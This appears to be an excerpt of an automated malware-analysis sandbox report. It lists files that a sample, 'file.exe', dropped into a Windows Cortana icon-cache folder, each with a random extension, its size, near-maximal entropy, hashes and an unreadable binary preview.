                Preview:.h...q...g>@.z.yJ5.....uN....h.........4.F.T.F..H.....s..m\.b".f....';..`......;Z. ./.L..bd...@..p..V..X..?\..}....P .r..n.P6..Zv..;......X...%..G<...9.}M.N%WdY6.....S}..]B.@...V$N...?e.3.p........]A.g..eV-.\....ebG.$...j..@}..........Y...!.....p.Y..Q.....^.2.r..6.t.G..+.h....>X*........[WT..3...>8.....kR..f..........\.b.?...M..p..:.o+.0.4.MI...+...<..Am.B...Z.PL.....9.~....V...9...a?._..5...S..a..B..J..I.....rq.0.7.!G."....r..>,c.....4......q.R......Y.7..r.....-u.!_\ ..Z..oZ5.8j...Zj.!E!.32.GM...4_.........Z..Fg.s(.eY.6e...(.ku}.A.S>..?.O..jlOb.a..B?.z$.v.w.'..a.m7.4x{..+._.....].q...S.j\....[...+.~>,.....N./.../.L..&M6*.e....l..4..G*p7.=....V..3..a..k.c9....yU...,.\?.......f.1.r.9P..X...f.c.../........P...9...`......H...h(.@|...v!.`......"..g...pn......hj..{3K..SH.M._.Z.7^....SJ/0...M..r..Q".(.ZH.... F=....@.....Qt`,...-.>...e.#..v....g.. ..REv {...v...@9:.am&p.H....>.#2/F?....n.{}.9.....^....`:H.rl=p.....?K..6....xOI.w...1.V.}0;

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_x64_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4548
                Entropy (8bit):7.965103272977858
                Encrypted:false
                SSDEEP:96:/Y5AnNaXxuDOKMBB0F+N2T7ASgOHz9IuqEYNNzM0miGWIv2T2GHezR:/Y5SXMBQ+4fgOTGpB7f902To
                MD5:E3D7C81620A92890FF817A0171550C42
                SHA1:18D79F61D91857D79984A41EA787779A86462BE5
                SHA-256:950D5071AC3896AD9279B00975FFEB507A080DBC775D1E76CAE61AD8CBAE4E84
                SHA-512:1F8619B79BF8DE1462D1A6509E9D8F1AD5675691278937410116DDC22870ABB3783A29CB5440956E6F49C892C4BDF7C80BA5E906AE54D48AE435A419D7EEE2FA
                Malicious:false
                Preview:.y...\e...3...^.>G...).;.B...u.j:(.........V=.".n.....By1....m...<...P+.;6(.{wJ...0:K._).%w;.YT1........#..U.&..(...y.."..............&..l*......;..ngb*...!...&...Zy^......D. ;....d.iwU1:T2.....A.".0..Tx..^l@.!o.pEh....h.6Q..O..a0L.1.o....v|../.&.S.R....Q...T*.2.....A.......J....7)O........#tz.0........u.....j..6..`K$o.{.)L......?.w.=H.E...Z..+..0.v....*.1.g...m|.'.._..h.Ki...q;.(..BWz$@l.....ef...f.0....eO<$.....s.............p)......Dc~..}....e...^{/...'j-..;L....gpr5...G~6#..e.r.J...'...o.B........'A...*....(...<.6...|..r..F.J.|..c:9*.J.3.s.Z....K%*...Z...An..@......3._........i........w..B...r.<u...`..3../...slGN..Q.Y..=f.X...:.Nf].r.t.A.X..r.......O......Eo(./.61.B..9.....j.Q.s...ET2.t......Ic ...E...1.r.}8sk|....y.......'.......w...d.<.b..M..w..2$..v......%,>...2.....h.>.F..z..[...N.Q?.........|..c.`4.\..{w0.y..7.o.g...........e..GH..C..:....t...#'..._).........Z........"p...R.E..Y...%.t..r..<v ..l.f.T.*lY|..Pp

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt v3 Website_url.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4556
                Entropy (8bit):7.9686883082034745
                Encrypted:false
                SSDEEP:96:Ay/IfpmTsb4ifoFJBKGSksgBHvirhRIcBIuf74Np2GHezR:AZpOzTBBCSHvir4cpf74no
                MD5:E20374088DB876AAFBDD962B210DAD9D
                SHA1:7A8B14E940BDE694D88382B63566B5722E29DF62
                SHA-256:A6E11E38FB63A485396C5DB7CA5A8A19F99AD65D25523F80DEBBE8271233C2C9
                SHA-512:E0BF436A5562E8C5F6DB01BAE2380150777C2E3DDB40888D32DBFAF51FD4170A7D4A74951FD8F7C9EF83588864BA97EDDC3E51123561A63E5DF20E1F2326AD36
                Malicious:false
                Preview:..)[Y..+SM...(.&.....).#...2..@.9d.d.c...{...F..R.....M....0..i.....|........'H..j..$L..P.%*.;6...y....:...r.G{.}S..2.<.<*.3.u......T.....LpBK.....D...;h!w...E.$.H..5..z_).......m$-.....p`........t.b.z+I.Sv.RB......8F..n..4.a.y.yE..Jp...]...#..T....C3m'.g)K.lC.O.w.T.{....-'.}c...$X.^`.s.i...9@?.......b.-......'.>9`..q.@h..E.znb^D%.......}5....l....O..d..}.w@;R...&..|......6.Q)p.)...X... .!8M./.!.yW.F.4/...f......R..c..VX.#A..i...Z.....C^.-9l..,>Y......(f....0o.K.6WC.kSt.Vx.F...s.v.7..4/.CH.r..Q..b...{w`..gZ......H....L=..|)..s9O.N...D.8Jb..G.zS.\....&}DD.X..].;....q." .w...^..f.n....-o@Mi$.8.T.+.._.i.qX.[;.r..B...4C..]..%..]...+^J...V.I~...\"../V....{...(.b...F~..P.._.....^....K8_.X_..=.'.}*..C+...[i...t....}/...J>KR..2..o.....;I.>...>.q.wYd..f.d..j...H....R.?...u..{....`.....l....!9...I&.._...B.k....sA)...g.\."..K..pCVZ..n..V{.....P...,...u.......d..K..V.R?v....2M....|.9..j....8@o....j.wa.....3.......H.p[.Joj|.,u(....n.J=....*......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4537
                Entropy (8bit):7.960673033580609
                Encrypted:false
                SSDEEP:96:fP2X3lez7h3DQEH8T6c3Y7j0PEzUW/Wl8k5c78t5dHjisa2GHezR:fPY3IHhTQu8OcoXYEAW/W+kO78vp4o
                MD5:1646A64F88F84FEAA14D2DB583707F38
                SHA1:DED1373114C29435900435A3223967D66B3A48FF
                SHA-256:055B6E3C4CEAF2CDB703119822E3C334700238DA46D2EA9C52899B85A85687EE
                SHA-512:0DCEE0EF46BE6BB2C529731DD0B895F537B937A6AEABF33E893AEDE635C4DCFA14AC7C8B28D30E4794CC84E2A1AC9AF4A1C252675AFDB11B37230500637ED693
                Malicious:false
                Preview:...>. ..s.$.. ..<..0...X..io....K.."......%.i..... p..7......n....Y`....g(i#..~.{...Fc.)@...........H......%">.a...a.&.x.aL)...M=7.>7ya..z.7..AK.V\.\..Y.w.....|r..=6kO.hg...... .v.\.E.S.T...t..M.....(..........2S.R.e}.d...0P..K.C..m.)...{...@R:.1.......c...I..e.e..I.X....kI..L...3......=.!.Z.W..(.ua41......S.a6.+.......v..i.;.oKz.....m.Q.....D.f5N.....VVC..k...t.J.H.i.....+BZ.....%.....a..OP....&.f./....._i.....%u.Q.fb..Q+..a....'.I......Qvz.R.l.A....6..C~P..a..i5..wr$F.......C-.....k.W..D...S.gd..&..%..oG4o.......!$.c....i..>...?.>..n..>B..eSx.^..8..Qa......S8..-/n....9.....f...M.....4.F....^4.m0...........Ai#.......cT.?...Q*}..)b ..u.b....-.-.x....V.Nl.2...Cm]....iO^/.K..-...u.....,.Renh....,..;1.0..0 .9..J.-$.b......IT..r$...~...J.!.3X...-.....s..l-...D.F.6.z</n.L.}..R.P..q=.M3.p....`.Dg{..?...%U.. .gd5^...z..R...<4.E..f...v.q6eu$...E..~`A.........H.o.......wB.@../r....6.....RY.....d...K....l{.d.Y.ba...FzEwo..e..v+o....h(W......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_x64_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4542
                Entropy (8bit):7.960613154349404
                Encrypted:false
                SSDEEP:96:Wz6hGL9q0ccIoqa7WN0G8IiftENXhQ0apXeqEsOR0kn2GHezR:Wz6hGL9q0Hqa7A0GvE0QBpXeYvio
                MD5:09ED648921B922786A5C995F6665AC57
                SHA1:F92DA8D96CD5D46269B91EC3B2DDE0A5DC193E57
                SHA-256:44699D8DD5152E6E501049A389A952E89995235BBA9105048CDF813142E3B25F
                SHA-512:999233CBD7C9546364C674E0BED73645901057296BE70A7F502EF5E660AC7E0EB8DA0294EC2FC00E05C91FC3C05A683B55778A46EF84488788E88E36BEDFD160
                Malicious:false
                Preview:...n..z...!.~./S5..%.1.%...5..(0e..m..$._C...*.Q9/.TB~.N..Wc.E..N.~<..5...NV.Qq....EtqQ..gFD:...e.$.c....gc.,....n..,..4...i-.]..b..x..Lp.m.......|B...*........c......d_.I.jHz....Y..`..j...I....U..C.....~......e..Xbv.....u8.....^e ...6.3'..x......dH.]d.....0..=....p%(.>i.=.....r..w.P.4...bo=.....yv...jFg.2..o@x....LqE.'.^.M...s.....5.St....<..6..'.k.`.h.\p.l...nTG..X...p.'..-S...1J..<......+.....t...$/.`..}...;.l......(.6=.wjfrz...6f`.H.sQ.%P.Q...Z.p...wZ.X... ..-a.t>.>4..b...m..$L..B.m.fE%.. ...M7<.w.V....7..e{..k.z..)...8I....$zK,...z.6...M......P:..+.I.......P.Q....n......mF.F..C...@/{9.....$c.h.a.."..!#...So.M.P..@^.;F.........?.........$..0.G..g.K.`..|..e.X.....g.J;.>..s.W.N|..-.'..:...-..*-q]....J.>.e!^.4...i.9.:....i.D....g...*..y.......C(.k..........IX.....V9A.t-H...\i...g..sx.......T.k0...,..H!:.Sc.B.qy^>(i....Rv.UQ....+...`..j...r.Z..PZ.X.c.iqf..|.....a..68.yYX..\I........H..g........M.x&>.[.B#.4.E.Dx.U..h&$..^E..YI.O....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_ActiveX_VBScript.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4552
                Entropy (8bit):7.963953136911692
                Encrypted:false
                SSDEEP:96:1NR78sqXDUM0Qdlnv2DV1qfzaP0rLXI9LjaLsH2GHezR:9iXoDQQV1uzzrzI9LjaLsHo
                MD5:F73BEED9B90E96CCE066FEEA68CDB7B7
                SHA1:EDAE9C8CDA754C1CFEB3AC0B6C2D6CE263553965
                SHA-256:E3B9A3FD64F0995AAF1B89FEF0F68A818120BD0652E4B8A0105A89FCF95573E3
                SHA-512:CAEDF72CAB7CB457B6C6DB5577B76BCB39BBF3B05A08597587D36D8AA77FF2E1D310D72D19E45A42304B3321FB0ED471C0CC9A0DEF7AAF69FCB0AA56A447792C
                Malicious:false
                Preview:.Q.T}.]8;.C.Mt.z.....mL..C3.o$LN...?.W..a.....E.v.$.M..B.....G7c,........k$s.>*L.`.2....O..5nB..,kI..b.Y...7 .Z.G.......X..o.3....S....HA...4p.........!..h..9\.t.."..&.n...:..b...Ws..h_..VF.....a..U...b..I.s.....2.......@..P^..8DB..>0........9..>[.GR.R...}...I...t..5.|CT.$...}.Rf....!..G..f?5.5.z..lm.Gs...8.W^../ ..o.vx...N.D..R+...X..zh......o.....u..:g...|..l.O....&.....>.Wwyk(......u#o.+o?.....z....Bib...}..+\.w.......,.5....."....m..dL...S"......|k.}....1..V..g...*.*td...x..x.Y.J.u..Z.r.?k_..*y.Q...c....j?.N.P....j:.1..Ri5]..r.K.:..].{d...s.4........lx'. ..B...T.r........-H...to...>..B.@l..5..)..)l...t..8...P.Z....a.:....z./..6..iK...V...j.5. L.......)..;B.3....p...0.y"E1.*C..`#.@..c.Y.).).....N.Q#n.L.u...8..!$.r....-y..o.=.k..{Q......Tv.a7kg;5.w..t.oCO%...T...\...Ji..%<..y......:..3K{F...wj..4.bF.(.@w.....r...Y...SS..+.oLD.W.l>....=..E.).....%..p.s.._....z?w..#..a...f.rO.? ..*.9.`.{.G.....Z.3..".....?.....C[j0.wh....'j].N...R..B........k..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_AutoItX_chm.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4541
                Entropy (8bit):7.9576570774333515
                Encrypted:false
                SSDEEP:96:xb3QpC1OBfZKYDGXP9fsLiHmnNulGjIRhr4jcJS7YTFt2hSu2GHezR:IQ6K0klfk7NukM4jcsS2No
                MD5:6CAE7300A0ECAC63970701A07A5F3AF4
                SHA1:7C2CC4DEC1793EEAF1C71BEF4B25C9F06BEB28DD
                SHA-256:85A9A4204AD1F4FF7FA5439E64740FCEF9301A5586CD020682853B2D56A5D028
                SHA-512:499FFD1E6A37648C121F2D4D1F8FBDE751BED9C9B7CABF69043AEF785FD52BCD85C3A19EE7C74F64051EC759E429BE2E173F062C95DFD45A44273D5CEA4D6C44
                Malicious:false
                Preview:........L..f.....ZJ.......A.....t........IK...*.b.^.....o$.V....t]?.....%.b.......=mj.....dx.Qcus.s.}B....i\7.d2..o...z......./W.W.......<\..xy..@/.R.D..^.B....0.J..../...K.x...*2..._R..z.N........i.Tp|.2d....ca...#y@;.cL5)...Fu.!t.2.+.aY.F......VRp1.\$s..k...lo.p`.{.|..._C.M..)..#.Cl.....P.....+.g...%+...F.h,.Ld.+GW.x.1.>.q)......b!.@y..0.Q#o.Fp.z....g+`i.J...ZF..Z...Nq..0"..:.<..XiJ..K....uY......:..M...pU.r.2..y..!L....Et^.).....g......Us........"jM...'.2..)a..#.[.@.%.....Q.E.. ....>.......g._..0...K.........]......*..Vx..t..m...'*o.E..-..M~............b..2.@3...d..t.......L....c...M.&.`..?K..7..?).....@V.x{u..u......C...g.r.m.Z.g.....b,..."...=.g..u..5.MK...du.W|.L.N.^..7..)..d.......:./....la.^.........H.C........He.=.z%.O...._.<..M..(.V....6..g\9.W.A.Zg.........c$....>.g~......ib|I...Ii..{..4.6.4+.......pg..'.O............FC.h.IuCah..VZz.k..].=...UN.%..l.c...c.|.nB.H..t.....I.....e.......P.;DnBNY.],.t.!...s(.3.7UT.".YJ..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt_chm.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4539
                Entropy (8bit):7.9577152970490745
                Encrypted:false
                SSDEEP:96:VE7TZnkGtbW7280y7LDBOU2ny+LuBdEhvP75nPY24HWJd8HWeffC9l2GHezR:fGVW2zoDBHP+La8Fg24HWJUWeffAo
                MD5:D261579752A53C2BD10C18A2A4F9F1BC
                SHA1:9EBAA5BD058310CE7AFA52EBD2D1120A995C591B
                SHA-256:796FEDC8E194DF561768E049BBEAD5DA11573A410646D7361EE784EA840698FE
                SHA-512:14E703AB330944ADD2B101E3CB2530969413876160B2B51651CA4896B71ABFC51B1FFE48AD782E80310F447DF2D3B05595E108CCAC7AD9AC973EEB94730634BC
                Malicious:false
                Preview:O...I....(....._...(.3.|.4K...7.m..I...RwvZ.UQ.'..%.....>X..&U.....yW..y..(.x*,.S(I!w...j.H.:.-.-..?...6....l.....X..nM<.3.M....J..\...4'7...M.0ch8.....r.Z.6.....:...!^..B....0Pi...h.J....0..a8{}p....Q..v].`......\.aJ.g....R..A..h.".G-.....>......j../..>.......@..N`...m.b@..|.i.m........t...Q..{d...\/...9|prc..w"...k.x.9v.....A..b.G...@O..s.xQ..S..;...\....D.#....?m.}....`.$..Oq?......"..VP.{.m..oK..he......:.L...'LH....Uh....~.$.E0.....83....P.o(H....N...M.P^........]....=.I..H..a.&..vn.....I:.4.....BP].t...9........e....HG....%.`..y.Q.I...r.S..73..7|{.WH{..C.Re...i.....eN.y.^e.~.8........Q.+...}|.tWx.....).....'U.9......]d9...(....Nc...U8..k.$.......... ..t.U<YB......Y9|.....y....i..K$......D.Y..:.$6(.....$..N.\...o_.I..h..v`].E......F...<@`.<..D...wO..m..)..S...[922...F./..9[{.ou[.q.D.iN..V..v8..L...+.+......I*....Hy+.Pn..U}.T0v@.....%A.yX.h&.O%..M......B..1....f...I.....?..#`....W.\A-.&>..h.....:sG.=..P.Gf.'...m-..o..~...Sl.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Examples.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4547
                Entropy (8bit):7.952830886668987
                Encrypted:false
                SSDEEP:96:kyZ/nJfNhETAThBPAZmIijfuw3v0nQPnaJdKkQnCTj7ekxhch7zLHA2GHezR:kyvlmgBSPqfu9ymKTCDe4ah7vAo
                MD5:819D2212268AF21F1409721BFD1A832D
                SHA1:BC2ED1E46F93E38B70C6C072FF469C641C6CCDD0
                SHA-256:A38A7BEA68E758BE6831793CEE0A5EC481A2608DC1DB31FF25A8C1D369700607
                SHA-512:A68C09047C77AA3A4D392BA1B76A1DE4F1FE1A6550FB82D70BE45853F88BC6CC686CED92CBB59C7E600790009BDDEA2539DD1C9E1C110089B82F0B90FB79C4E1
                Malicious:false
                Preview:....5.h..\2uX......w.U".p..,..)I..q....L@.3...:.~.....g./..g....^E..W.......$w6E..4....N..r.z.....s.....z..x>....=hp.$..da.3..B.m.......#9.owD..h4@<xP).0.>.._....`....sBR..}.....&..."...1..\..JZ.........o.D.o.^....Vv.F...(...d..1..@..D;...w.%<..v2-..4`h..}>X..(w.H...n..'R./..97#.Q......c.X.!:$..4.(M..X.AF/.4f....D.MI.7....$....^.=..t....[.....,.....!+9...V.G....."I_*(...,...9...>.6.}.7.|..z[+..sl... .g{l......0'.N..d.j..8.#.|....C.....R$6........&d...F...D.?..*~..h.w..:.d...'.U:..<C.I....\.=h.6.gu..#...n|4..l.7.xb..!.h..`..C.T.;....ZV=.......g.M.......">..v.....K`..I...FjL.u'Vq.b.Z]O.%\V?..o..OQ....([.....P.p.].P.1.6..-,r...u.J..^V.:H/...U}.....(G...,.1.....2QOi....x..;t. ...^..Gc5.!..P;.U.3..~1..Y..:...)%YF.ko.*~.H..>.%.....q...9*...+I...i...Y.7@A3.....8......,..?].3....R.'%.(R.kw..p.@....2..U.3Y..&!..+.>\...rs.r"3T.t.i|~n~;..2..K.NZ.r...y\(X.;.l4Bn..Z....L......u.A.w.g....I.v.o2.*..pZ.....B.....E...0..,...Zf...V.:@P.......k.G

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Extras.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4541
                Entropy (8bit):7.958596304563695
                Encrypted:false
                SSDEEP:96:RxmLIo1Ydq1cHpZUogsNmJ0IN+23yDJenhN+xnK2+grZk2GHezR:bm8AWWsNhPWcJehN+7dko
                MD5:336C5EBB076724BFEDC95E7A96E1C88F
                SHA1:59A847452282F83EE1878DEBB4D394ED085984EE
                SHA-256:565184092A61D94162DAA4D06979A5EDA21EA86890DC7BC04950BBC902C27299
                SHA-512:55821DA53AD402A77988B944FA882622AEE87FC1D3075D0A5E67D27F69D09DA1F7F27CDACB4E4DEB6A312CD0BD52A1E4DD6F21078044DD75570F78D348C4569E
                Malicious:false
                Preview:i........F.gD...`H.!/@r...JF...w..'..ia.....#.]..o...S.q.v._..}.k..1..d..v.a.E...%..|.o...@.......vl;.`I...0_a..k..!.7QGk.EB.l'.<...8`...l.L.G.X.DZ.?../.....'..R#O.'.......d....d.31.Rs.q.Y]..!p9.4{]...."c.S.M.$....0"H.L.Hb|.]..I.JP..0./f0.x.d.>.|ch..0.4...`>.a@...!p..$...\`.......olAB...*.1...<...y...v.z.&.....}.D.........v.v..,.yJ1.....p...)...*AE....Q...)..Ki._..gK.....|.q....?....W..g.>....>`...! CG...M;....r....1w.z.Y...`..v..X...u[...I!.ax..)....{...s...c.ln..jN..........)`eLm....n.-..*......|+..K.a.2..m?....6..J..;......}N...i..n.F.@.2....wcM$...k....d........e.3>0....E.b.,c.w.y.u..@.$p..k..B.e*I....).x{S`.3.\.nL....(...&....e.T..R....\..(......0{4.v.}.~Z.}t....b.."R.Z..j.....{P.....Z..}^.Tw.+..wE.-z.6.2<U.....r..TS.......7..I.:....P..7..0mP2*...E....9...h!..N~....Y..r!.Tl.(.T........`.^\..[}O.=o..0.&....I.... Zs?{Yom..~..n.a.......y....-.{D.....h.L4g~.q..(..7y\..M.z..5..g.[l.1..a.p.y ..j*..o^.dK.xM...8.+A.Z.K..AZ..[.vO...(...h......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_SciTE_SciTE_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4546
                Entropy (8bit):7.956372622443581
                Encrypted:false
                SSDEEP:96:gq7CfCThsft7c/NrwWxkIz11j5WKLgLbyk7tV2GHezR:giLhg7sKWiq5WKcH/ZVo
                MD5:F8B2A9DEBFCA1F73E4A87A288E96D902
                SHA1:5F0CE43201F7BA6B8817A6E9B88FB9BA77B28B86
                SHA-256:D25648BD3EFF01C15328E7FC40A95506DD895D6E293649ACEC6C5AD437D2F214
                SHA-512:F3FBAF6B8365659698AD02818696911135FEFC4C07D5D44A046685ECB79A116B94FCD5C334196B9C35BDF6B49977B28F8DFEE31962E90337037D3E19A095A8E9
                Malicious:false
                Preview:.c..K...B%lcO?.e.L>.^.z....|.[.......tn....Pg.UW,.,....x..i..9.7....5.6...o.'.'Y.8...&.....?VI...e.E..Z"B...=.V....t.....s.?..G.B....H.O...:O1T ........c....,3ip....t.^I9=....&.1....p.;..>FE..l...Q$...~3T.X.sV...l..M.....\..........Vfd.{.%%#.......=.D.@.@..|...N..e..c+..C..H.D........JC...F.......).}..P....c...QS..Q.tfYH..W...x.:%..|D.......[.../M..4f.07..#.Nlt.&.Eddv...Ud.3..y....XwV.N...,)J..~T/.....?.`..|h..*%'5. .gA.u....+..'....u....?J6.m...V1..Ii+G...F..%..W_T...e...5..^...Ds.......5v,.&.!..+r.]......;.....%/R..{..MPhHM..'..t.4...Z...jc./.=.XZ.e.q............zl.e_.6.0'vA...|-0.()K.C$.R3.Oqkw.r..z<'.K/}4......{...Dz's..._..1...5F.Z.Y%:.v.2.E)..l.>...B.....J..d......[W.J..WL......0O........3%.O.>.c$!..j....."A0...y$..=[..a...'B...P....j.Z1u.f>Yu...R.g....8h?.l._..Y.@....3....H......D.0.K?.m.%...fE..C...&..Y..w/.vz...6M..u:oR.DA....`.n.*..tuC1......).;.T.&..56....+...^yP:..P5...Jml..W6...:.c.T....). .-k$Aj#Ec.....I..S....9.....R...40}

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Java_jre1_8_0_211_bin_javacpl_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4563
                Entropy (8bit):7.956365291498494
                Encrypted:false
                SSDEEP:96:t/eHNdpxOcLy6A3BubySsI7mysSi+PciZZXZHMD+JtJ/+gvHhzIZ2GHezR:t/UDOcLbCBUyC3saLQ2fhhIZo
                MD5:F7EA61269614076AE1B8500A1E82DBE4
                SHA1:43B49553CA8A0E526BCAA00B4E10327DB107E7D6
                SHA-256:482E697924515AAA47CB241B2125157D25B71DE11FA30651FA3AD7E85C1003AC
                SHA-512:61D052CCE2E86CFE29FA79455775DB3241A31FF5927C2674D2435368C470AF93DC9929294EB12FB1236B0868C7E13D10816DAF3201B3123FB11B34A01AB4DC45
                Malicious:false
                Preview:F`O.D......gx.XNu.j.o..<:w...d.7....+2.M...'f_.....q....{K`].Mlm.~...k.Q.r..... ....g.0h...fa.)....J]..W..<..&oA@..I}..wE...f.....W4..].r...{.8s%bOr..yz=...h|k...).(.,Z.l`.s&....z%.=Y|QH....z.....qrgN.....EEF._...A~...Z....\.R.....N.y..e3].........jy.....4.+.L....d.B.>L....t.yz.+.........m.N+.g=....Gb..a..............<..H..~Z6OKS|.q...V..fe.........6....H....x.8...V.....R!.....X]..........W.\.x."sO%..U.......i!y?.5.0A\6.e...p..a...>...%.......H..R...Bl.d.`zoJ.n.......t bG?`S_Q.<....0....?Vb:j....#.'..My.....w.....md....^.\^..aE...,...j...z...:q6....^?......^"..x.........m[O;.=.D..........bOH..o...-.c\u...E...W.Qn.%. .<;..$.........o.Q.$.hu+l...1.5..m|.~...<.:.b...@.JsCuF.{!nU.J.+..!NM:.ld>%v..Dk...&aS[Q...@#.....1....4;.v}...e.&.[.[^.InaO.....t."..Vs...w|] .[V.h..3o9...@Vz...(..|V.Jw.B.q..$2...:.....*.J.f..#..vZ<._.$...|".+y.~.O..Z...s.U...WZ..=R_..?n..L...{..b.$.rd..<..W..Xd<HS..V.......I4bG ....V..gr...=......=..o..8..6.f....I....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_DCF_DATABASECOMPARE_EXE.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4579
                Entropy (8bit):7.959374499349583
                Encrypted:false
                SSDEEP:96:pHPq0Ab58sScr+/dJuMWeH1hnc2kbGr+FDtOmgFW2nRposrYDVmFVd+2GHezR:5S0AbCshkjnMqr+FDtOmqnRpXYDSVd+o
                MD5:24478368468055E6502470BB28B5C00A
                SHA1:D99456F4962DE405AC732CB5366310F1BD0029F1
                SHA-256:D9DEEF9EAB805DC91E7091F13259932AEF1FC802E04B9D51819515B86869395B
                SHA-512:77A3A4DBC89B4FC80209AEC56CCAAF9C7046257E67FC38A3B89D7895FDB8FC68A3F56AD82372BF1F101C747FA4810E08BAAAA3D7C4289AA06EE55C957C230EB2
                Malicious:false
                Preview:zE.Z......Z.........).O%...}[..^..(.nk...v.|...`...ute.{.)....?.`.,.....J.....4...Gc..djq.@......:....[.p.F..V...S.B3..8...x'...^.......DM..P..%.r... ....0y....O\9}.....?...1...w...[....A..<W..9B.t.G...U.L.G....G.....7v....:.N1.......~...N......`.I...=F.d.[C.!.....E..M.........Mb..8.7..Rb3.............'M...yo...'.4.mO..Y...c.>......|m.0......._B....%.?.3S."R........!&kWC:T;U..F.[p.1.O.M.(..._~<..bPC_.S6x..K(Of."..tG-.\.;.y.p.(Y&.......V?..32...F).O.g....b......,.]..|.KE.W...E.~.j..g....6..e.8.{...D.(F.N.,.*........MZ.z......"sEd".}..k.@|.8...Q8)...`.......}......lx.d...i..U....%...Z........8......8S(.1&...^.......I...}]!.........R.t...8..'t1...P....2a.rw..]..u-\?...:.E~.(.....Xf..-i.o<............E..."(v..."@..pl..SqI..-X0:.&V..,...`.v...A.6.8"w..#..E7....4.D.....tD...Bn..].N....\.,..l<.Lj............#l$d......`m.. k..G.42&.........F....<.)w>...6...?{:..Y.w.)....$.d..Z[o..'...!6..#...[.....B]....Zu..SuQw...#.z.G.?s....h.q..a...\..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_DCF_SPREADSHEETCOMPARE_EXE.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4585
                Entropy (8bit):7.958391871521466
                Encrypted:false
                SSDEEP:96:NplKffi3X8xzuKhmVdVNH/yggyouaHB5Dfcf0/G+wf9C2GHezR:9+uOzudNHqThHJUCo
                MD5:DEECF8AE15E06A3B936662B5A40AAD16
                SHA1:F07B0FB50D1777FE20080FF9BE47A3AF34EBA518
                SHA-256:CC732AE92D6E8900CF3B82DFCBB1DEE5A24C2B916974A3C1CB9B2405D9736332
                SHA-512:DA381A5AAF5AA1915230E1F9DB3F523CA3EC00DBCECC99B7CD294CCEF6B578DF11E53C1E537DDE6AA6F6F47E15F4A9C4D84DA7F7B8FE7D9732A9A6EA7359DB1C
                Malicious:false
